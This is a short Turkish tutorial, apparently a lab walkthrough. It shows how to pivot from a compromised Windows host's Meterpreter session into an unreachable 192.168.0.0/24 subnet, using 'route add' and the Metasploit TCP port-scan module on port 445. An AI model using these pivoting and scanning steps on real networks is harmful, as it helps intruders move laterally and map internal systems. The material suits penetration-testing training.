Bu yazıda saldırgana ait olan Kali bilgisayarın tek bir IP adresi olup bu adres 10.0.0.50’dir. Meterpreter ile erişim elde edilen Windows bilgisayarın ise, 2 ayrı ağa ait olan iki IP değeri vardır. Birincisi, saldırganın istismar ederken erişebildiği 10.0.0.25 IP adresidir. İkincisi ise, saldırgan tarafından direk olarak erişim sağlanamayan 192.168.0.80 IP adresidir.
ifconfig
Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için Meterpreter route komutu kullanılabilir. Bu amaçla, komutun seçenekleri incelenir, yönlendirme işlemi mevcut oturum değeri (Session ID) için gerçekleştirilir. Sonuçta da, yönlendirme tablosuna yeni bir girdi eklenmiş olur.
background
route -h
route print
route add 192.168.0.0 255.255.255.0 1
route print
Meterpreter oturumunda yönlendirme tablosuna yeni girdi yapılmasıyla, 192.168.0.0/24 ağına gidecek taleplerin mevcut Meterpreter bağlantısı üzerinden gitmesi sağlanmıştır. Bu durumda gerçekleştirilecek olan MSF tcp auxiliary modülü ile port taraması, Meterpreter üzerinden geçecektir. Port taraması için modül seçilir, modüle tarama parametreleri verilir ve modül seçenekleri incelenir.
background
use auxiliary/scanner/portscan/tcp
set PORTS 445
set RHOSTS 192.168.0.0/24
set THREADS 50
show options
Böylece, Meterpreter üzerinden başka bir ağda tarama işlemi gerçekleştirilebilir.
run
İşlemler yapıldıktan sonra belirli bir yönlendirmeyi iptal etmek için “delete”, tüm yönlendirmeleri kaldırmak için ise “flush” kullanılabilir.
route delete 192.168.0.0 255.255.255.0 1
route flush